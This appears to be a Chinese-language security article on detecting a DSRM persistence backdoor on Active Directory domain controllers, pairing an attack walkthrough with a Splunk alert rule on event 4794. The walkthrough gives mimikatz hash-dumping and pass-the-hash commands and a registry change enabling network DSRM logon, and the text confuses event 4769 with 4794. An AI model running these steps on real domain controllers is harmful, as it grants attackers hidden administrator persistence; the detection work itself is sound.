基于AD Event日志實(shí)時(shí)檢測DSRM后門

01、簡介

每個(gè)域控制器都有一個(gè)目錄還原模式（DSRM）帳戶，它的密碼是在安裝域控時(shí)設(shè)置的，實(shí)際上它對(duì)應(yīng)的就是sam文件里的本地管理員“administrator”，基本很少會(huì)被重置，因此有著極強(qiáng)的隱蔽性。攻擊者通過獲取域控的DSRM密碼，就可以使用帳戶通過網(wǎng)絡(luò)登錄到域控服務(wù)器，從而達(dá)到權(quán)限維持的目的。

域內(nèi)權(quán)限維持的方式有很多，每增加一條安全檢測規(guī)則，就多一層安全保障。針對(duì)DSRM后門，基于AD Event日志能夠幫助我們提供什么維度的檢測，我們通過一個(gè)后門利用實(shí)例來看一下。

02、利用方式

（1）獲取域內(nèi)用戶Hash

使用mimikatz查看域內(nèi)用戶test的NTLM Hash。

mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test

（2）將DSRM帳戶和域用戶的NTLM Hash同步

使用DSRM的密碼和指定域用戶test的密碼進(jìn)行同步，在命令行環(huán)境中使用ntdsutil工具重置DSRM管理員密碼。

（3）抓取DSRM密碼

因同步域內(nèi)用戶test的NTLM Hash，可以發(fā)現(xiàn)，DSRM Hash 和域用戶test的NTLM Hash一致。

mimikatz # privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam

（4）修改DSRM登錄方式

DSRM 有三種登錄方式，具體如下：

0：默認(rèn)值，只有當(dāng)域控制器重啟并進(jìn)入 DSRM 模式時(shí)，才可以使用 DSRM 管理員賬號(hào)1：只有當(dāng)本地 AD、DS 服務(wù)停止時(shí)，才可以使用 DSRM 管理員賬號(hào)登錄域控制器2：在任何情況下，都可以使用 DSRM 管理員賬號(hào)登錄域控制器

如果要使用 DSRM 賬號(hào)通過網(wǎng)絡(luò)登錄域控制器，需要將該值設(shè)置為 2。

修改注冊(cè)表:

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2

（5）使用DSRM遠(yuǎn)程登錄

在域成員服務(wù)器上使用DSRM進(jìn)行遠(yuǎn)程登錄，注意domain使用域控的主機(jī)名。

mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040

03、攻擊檢測

當(dāng)攻擊者嘗試重置DSRM管理員密碼或是指定域內(nèi)用戶NTLM Hash同步時(shí)，都會(huì)生成4769事件，因此可以實(shí)時(shí)監(jiān)控4794事件，一旦攻擊者嘗試修改DSRM密碼就會(huì)觸發(fā)告警。

4794事件：每次更改目錄還原模式（DSRM）管理員密碼時(shí)，就會(huì)生成此事件，包含SID和帳戶名，以及調(diào)用方工作站。

安全規(guī)則：

index=ad  EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time  by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"時(shí)間內(nèi)，域控服務(wù)器："+dest +" 疑似DSRM域后門行為，試圖設(shè)置目錄服務(wù)還原模式管理員密碼"+count+"次，操作賬號(hào)："+user| table start_time end_time user message

安全告警效果如下圖：